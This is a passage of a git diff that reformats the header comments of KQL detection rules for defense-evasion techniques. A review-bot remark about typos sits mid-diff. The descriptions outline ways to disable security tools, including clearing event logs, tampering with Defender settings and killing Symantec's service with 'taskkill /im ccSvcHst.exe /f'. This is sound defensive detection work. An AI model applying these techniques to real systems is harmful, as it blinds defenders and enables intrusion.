 // Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic".
-This technique were seen used by threat actors and ransomware strains in order to evade defenses.
-
+// This technique were seen used by threat actors and ransomware strains in order to evade defenses.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql
index 806398c0..5b5bfe00 100644
--- a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql
+++ b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql
@@ -3,8 +3,7 @@
 // Date: 2022-09-05
 // Level: high
 // Description: Detect creation of suspicious executable file names.
-Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
-
+// Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1564
diff --git a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql
index bf8df16e..1bdd6395 100644
--- a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql
+++ b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql
@@ -3,7 +3,6 @@
 // Date: 2022-11-07
 // Level: medium
 // Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036.007
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql
index 142dc056..c104c74f 100644
--- a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql
+++ b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql
@@ -3,8 +3,7 @@
 // Date: 2022-01-16
 // Level: medium
 // Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
-Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
-
+// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218.007
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql
index c10a7be9..d896dce7 100644
--- a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql
+++ b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql
@@ -3,9 +3,8 @@
 // Date: 2023-11-21
 // Level: high
 // Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
-Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
-IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
-
+// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
diff --git a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql
index ce814bbd..1d716247 100644
--- a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2024-08-07
 // Level: high
 // Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location.
-Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
-
+// Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036.005
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql
index 0007595c..9a592f94 100644
--- a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql
+++ b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql
@@ -3,7 +3,6 @@
 // Date: 2025-09-23
 // Level: high
 // Description: Detects attempts to freeze a process likely an EDR or an antimalware service process through EDR-Freeze that abuses the WerFaultSecure.exe process to suspend security software.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql
index b0422cb6..a85047d3 100644
--- a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql
+++ b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql
@@ -3,8 +3,7 @@
 // Date: 2019-04-08
 // Level: medium
 // Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.
-This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
-
+// This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.t1562.001, attack.defense-evasion
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_service_installed.kql b/KQL/rules/Defense Evasion/suspicious_service_installed.kql
index 439ddb56..12a796f6 100644
--- a/KQL/rules/Defense Evasion/suspicious_service_installed.kql
+++ b/KQL/rules/Defense Evasion/suspicious_service_installed.kql
@@ -3,8 +3,7 @@
 // Date: 2019-04-08
 // Level: medium
 // Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.
-Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
-
+// Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
 // MITRE Tactic: Defense Evasion
 // Tags: attack.t1562.001, attack.defense-evasion
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql
index d1ea84e1..a7fe1b13 100644
--- a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql
+++ b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql
@@ -3,8 +3,7 @@
 // Date: 2024-12-01
 // Level: high
 // Description: Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands.
-Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.
-
+// Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218.011
diff --git a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql
index 56279558..0e879f4f 100644
--- a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql
+++ b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql
@@ -3,8 +3,7 @@
 // Date: 2025-10-23
 // Level: high
 // Description: Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.
-Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.
-
+// Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.lateral-movement, attack.t1021.003, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
index 75d606c8..0bc2610c 100644
--- a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
+++ b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
@@ -3,7 +3,6 @@
 // Date: 2025-08-22
 // Level: high
 // Description: Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql
index a7a9987a..9f4eb0a1 100644
--- a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql
+++ b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql
@@ -3,9 +3,8 @@
 // Date: 2021-07-07
 // Level: high
 // Description: Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes.
-It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts.
-The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity.
-
+// It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts.
+// The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.impact, attack.t1490
diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql
index 3e986e69..534e2f08 100644
--- a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2022-03-22
 // Level: high
 // Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql
index 6a22e04a..b3fcbcbd 100644
--- a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql
+++ b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql
@@ -3,7 +3,6 @@
 // Date: 2022-09-01
 // Level: high
 // Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.impact, attack.t1489, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql
index 001bb487..cdc0a124 100644
--- a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql
+++ b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql
@@ -3,7 +3,6 @@
 // Date: 2022-02-26
 // Level: high
 // Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036
diff --git a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql
index 092d7cfc..41be0cce 100644
--- a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql
+++ b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql
@@ -3,8 +3,7 @@
 // Date: 2023-07-12
 // Level: medium
 // Description: Detects a network connection initiated by "wordpad.exe" over uncommon destination ports.
-This might indicate potential process injection activity from a beacon or similar mechanisms.
-
+// This might indicate potential process injection activity from a beacon or similar mechanisms.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.command-and-control
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql
index 6b453a5d..8ac7a924 100644
--- a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql
+++ b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql
@@ -3,7 +3,6 @@
 // Date: 2021-10-15
 // Level: high
 // Description: Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1070.002
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql
index 5a9e25de..f305d2d9 100644
--- a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql
+++ b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql
@@ -3,8 +3,7 @@
 // Date: 2022-07-28
 // Level: high
 // Description: Detects changes in Sysmon driver altitude value.
-If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
-
+// If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql
index bf4db1ad..a581c612 100644
--- a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql
+++ b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql
@@ -3,7 +3,6 @@
 // Date: 2017-11-27
 // Level: high
 // Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036
diff --git a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql
index d4c7f2bf..10f3b51e 100644
--- a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql
+++ b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql
@@ -3,8 +3,7 @@
 // Date: 2024-05-27
 // Level: medium
 // Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information.
-This process is primarily used to detect and avoid virtualization and analysis environments.
-
+// This process is primarily used to detect and avoid virtualization and analysis environments.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1497.001, attack.discovery, attack.t1082
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql
index 5e2e5392..c495f662 100644
--- a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql
+++ b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql
@@ -3,9 +3,8 @@
 // Date: 2022-09-13
 // Level: high
 // Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
-Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
-As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
-
+// Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
+// As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
diff --git a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql
index b03e4751..7dc6f0b7 100644
--- a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql
+++ b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2023-09-18
 // Level: medium
 // Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql
index e48f2624..0fdfd14b 100644
--- a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2023-09-18
 // Level: medium
 // Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql
index 74008bae..1d237a37 100644
--- a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql
@@ -3,10 +3,9 @@
 // Date: 2020-03-13
 // Level: medium
 // Description: Detects uncommon child processes of Appvlp.EXE
-Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
-Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
-or to mark a file as a system file.
-
+// Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
+// Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
+// or to mark a file as a system file.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.t1218, attack.defense-evasion, attack.execution
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql
index 6d60358e..abbad71c 100644
--- a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2022-12-11
 // Level: high
 // Description: Detects uncommon child process of Setres.EXE.
-Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution.
-It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
-
+// Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution.
+// It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218, attack.t1202
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
index c7f78337..86cac343 100644
--- a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
+++ b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
@@ -3,9 +3,8 @@
 // Date: 2023-11-21
 // Level: high
 // Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
-Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
-IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
-
+// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql
index 00504d88..1a3263ab 100644
--- a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql
+++ b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql
@@ -3,8 +3,7 @@
 // Date: 2024-05-27
 // Level: high
 // Description: Detects the creation of files with scripting or executable extensions by Mysql daemon.
-Which could be an indicator of "User Defined Functions" abuse to download malware.
-
+// Which could be an indicator of "User Defined Functions" abuse to download malware.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion
diff --git a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql
index 1a9de40f..b3cae963 100644
--- a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql
+++ b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql
@@ -3,7 +3,6 @@
 // Date: 2022-01-04
 // Level: high
 // Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion
diff --git a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql
index 5e376ce7..1ada023b 100644
--- a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql
+++ b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql
@@ -3,11 +3,10 @@
 // Date: 2022-08-22
 // Level: medium
 // Description: Detects an uncommon parent process of "LINK.EXE".
-Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.
-Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity.
-This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location.
-By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
-
+// Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.
+// Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity.
+// This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location.
+// By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
diff --git a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql
index 7bc7d4f3..b6d06909 100644
--- a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql
+++ b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql
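Review bot: The newly added comment lines in the uncommon_link_exe_parent_process hunk carry the wording errors of the old unprefixed text forward, so the rule header now reads as a finished comment with typos in it: the first added line should read `// Link.EXE is Microsoft's incremental linker. It's a utility usually bundled with Visual Studio installation.` and the second `hardcoded call` rather than `hardcode call`. The same applies to the wlrmdr_exe_uncommon_argument_or_child_process hunk (`posses` should be `possess`) and the pua_adidnsdump_execution hunk (`Usee to Query/modify` should be `Used to query/modify`). These rule headers appear to be produced by the conversion script mentioned in the commit message; if so, the correction belongs in the upstream description text or in the converter rather than in hand edits to the generated output, so it is not undone on the next regeneration.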
@@ -3,7 +3,6 @@
 // Date: 2019-10-24
 // Level: medium
 // Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.credential-access, attack.t1558, attack.lateral-movement, attack.t1550.003
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql
index e5245706..726a5a94 100644
--- a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql
+++ b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql
@@ -3,7 +3,6 @@
 // Date: 2022-08-19
 // Level: medium
 // Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1216
diff --git a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql
index 9c84f6ec..aee95ba2 100644
--- a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql
+++ b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql
@@ -3,8 +3,7 @@
 // Date: 2022-09-14
 // Level: medium
 // Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
-An example would be a threat actor creating a new user via the net command and providing the password inline
-
+// An example would be a threat actor creating a new user via the net command and providing the password inline
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql
index 3039937b..e899bc16 100644
--- a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql
+++ b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql
@@ -3,7 +3,6 @@
 // Date: 2025-10-23
 // Level: medium
 // Description: Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1562, attack.t1569.002
diff --git a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql
index d73e7171..e664bc20 100644
--- a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql
+++ b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql
@@ -3,9 +3,8 @@
 // Date: 2025-07-09
 // Level: high
 // Description: Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys.
-This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives.
-Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product.
-
+// This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives.
+// Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql
index da30cb5a..feb92ebb 100644
--- a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql
+++ b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql
@@ -3,7 +3,6 @@
 // Date: 2019-10-26
 // Level: medium
 // Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql
index d6ec4baa..9575bbfd 100644
--- a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql
+++ b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql
@@ -3,9 +3,8 @@
 // Date: 2025-07-11
 // Level: high
 // Description: Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'.
-This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level,
